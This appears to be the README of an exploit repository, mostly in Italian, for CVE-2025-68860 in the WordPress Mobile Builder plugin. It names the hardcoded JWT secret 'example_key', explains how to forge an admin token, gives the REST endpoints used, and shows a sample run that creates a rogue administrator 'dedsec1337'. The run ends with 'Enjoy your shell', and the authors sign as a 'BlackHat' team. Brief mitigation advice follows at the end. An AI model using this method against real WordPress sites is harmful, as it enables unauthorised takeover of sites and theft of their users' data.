
Script di exploit per CVE-2025-68860 che colpisce il plugin WordPress Mobile Builder. Genera token JWT falsificati utilizzando un segreto hardcoded per autenticarsi come admin e creare nuovi account amministratore tramite l'API REST.
Il plugin WordPress Mobile builder versione 1.4.2 e precedenti presenta una vulnerabilità di Broken Authentication che consente a un attaccante di creare token JWT validi utilizzando il segreto predefinito "example_key" e di autenticarsi come admin (user_id=1). Con questo token, l'attaccante può creare un nuovo account amministratore e assumere il controllo del sito.
CVE: CVE-2025-68860
Causa: Utilizzo di una chiave segreta hardcoded "example_key" per JWT, senza una validazione adeguata.
Posizione della Vulnerabilità: Nel plugin Mobile builder, il file che gestisce l'autenticazione JWT (ad esempio class-jwt-auth.php) utilizza la costante JWT_SECRET con valore predefinito 'example_key'. Questo segreto non può essere modificato tramite le impostazioni, quindi un attaccante può creare token per qualsiasi user_id.
Impatto: Un attaccante può creare un token per user_id=1 (admin), accedere agli endpoint REST API e creare un nuovo utente con ruolo amministratore.
CVSS: Alto (punteggio 8.8) - vettore di rete, non richiede interazione con l'utente.
Lo script crea un token JWT con un payload contenente user_id: 1 (admin) dan secret "example_key".
Il token viene utilizzato per accedere a /wp-json/wp/v2/users/ per verificare l'accesso admin.
Se ha successo, lo script invia una richiesta POST a /wp-json/wp/v2/users per creare un nuovo utente con username dedsec1337, password admin, email [email protected] e ruolo administrator.
L'output mostra le credenziali e la risposta dell'API.
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
Un attaccante può creare un nuovo account amministratore, accedere a tutte le funzionalità di WordPress, installare plugin dannosi, modificare i contenuti, rubare i dati degli utenti o utilizzare il sito per ulteriori attacchi.
Questa vulnerabilità può essere sfruttata da remoto senza autenticazione preliminare.
Impatto: compromissione totale del sito WordPress.
Aggiorna immediatamente il plugin Mobile builder all'ultima versione (>=1.4.3).
Se non è disponibile un aggiornamento, disattiva temporaneamente il plugin.
Controlla se sono presenti utenti sospetti sul tuo sito.
Utilizza un web application firewall (WAF) per bloccare richieste sospette verso gli endpoint REST API.
Come misura temporanea, modifica la chiave segreta nel codice del plugin (se possibile) e limita l'accesso alla REST API.